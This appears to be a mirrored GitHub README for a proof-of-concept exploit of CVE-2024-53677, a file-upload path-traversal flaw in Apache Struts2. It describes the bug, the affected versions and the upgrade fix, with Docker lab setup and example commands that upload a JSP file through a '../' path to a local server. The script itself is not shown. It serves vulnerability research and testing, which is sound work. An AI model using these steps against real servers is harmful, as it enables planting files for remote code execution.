https://github.com/eqstlab/cve-2024-53677
File upload logic flaw in Apache Struts2 exploit
https://github.com/eqstlab/cve-2024-53677
cve-2024-53677 java jsp proof-of-concept security struts2 vulnerability
Last synced: 9 months ago
JSON representation
File upload logic flaw in Apache Struts2 exploit
- Host: GitHub
- URL: https://github.com/eqstlab/cve-2024-53677
- Owner: EQSTLab
- Created: 2025-01-03T02:30:53.000Z (over 1 year ago)
- Default Branch: main
- Last Pushed: 2025-01-03T18:51:20.000Z (over 1 year ago)
- Last Synced: 2025-02-23T17:47:35.189Z (over 1 year ago)
- Topics: cve-2024-53677, java, jsp, proof-of-concept, security, struts2, vulnerability
- Language: Shell
- Homepage:
- Size: 26.4 KB
- Stars: 6
- Watchers: 1
- Forks: 1
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
This post is a research article published by [EQSTLab](https://github.com/EQSTLab).
# CVE-2024-53677
★ CVE-2024-53677 Unrestricted Upload of File with Dangerous Type and RCE PoC ★
## Lab Setup
```sh
cd docker
docker build --ulimit nofile=122880:122880 -m 3G -t cve-2024-53677 .
docker run -p 8080:8080 --ulimit nofile=122880:122880 -m 3G --rm -it --name cve-2024-53677 cve-2024-53677
```
## Timeline
**Dec 11** : CVE-2024-53677 File Upload PoC Uploaded
## Description
CVE-2024-53677 : File upload logic in Apache Struts is flawed. An attacker can manipulate file upload params to enable paths traversal and under some circumstances this can lead to uploading a malicious file which can be used to perform Remote Code Execution. This issue affects Apache Struts: from 2.0.0 before 6.4.0. Users are recommended to upgrade to version 6.4.0 at least and migrate to the new file upload mechanism https://struts.apache.org/core-developers/file-upload . If you are not using an old file upload logic based on FileuploadInterceptor your application is safe. You can find more details in https://cwiki.apache.org/confluence/display/WW/S2-067.
## How to use
### Git clone
```
git clone https://github.com/EQSTLab/CVE-2024-53677.git
cd CVE-2024-53677
```
### Install packages
```sh
pip install -r requirements.txt
```
### Command
```sh
# Upload the default file
python CVE-2024-53677.py -u -p
# Upload Specified File
python CVE-2024-53677.py -u -p -f
```
### Example
```sh
python CVE-2024-53677.py -u http://localhost:8080/upload.action -p ../test.jsp
python CVE-2024-53677.py -u http://localhost:8080/upload.action -p ../test.jsp -f ./test.txt
```
### Output
**CVE-2024-53677.py**
### Result
# Disclaimer
This repository is not intended to be Object injection exploit to CVE-2024-53677. The purpose of this project is to help people learn about this vulnerability, and perhaps test their own applications.
# EQST Insight
We publish CVE and malware analysis once a month. If you're interested, please follow the links below to check out our publications.
https://www.skshieldus.com/eng/business/insight.do
# Reference
https://nvd.nist.gov/vuln/detail/CVE-2024-53677
https://y4tacker.github.io/2024/12/16/year/2024/12/Apache-Struts2-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%80%BB%E8%BE%91%E7%BB%95%E8%BF%87-CVE-2024-53677-S2-067/
https://attackerkb.com/topics/YfjepZ70DS/cve-2024-53677
https://github.com/Trackflaw/CVE-2023-50164-ApacheStruts2-Docker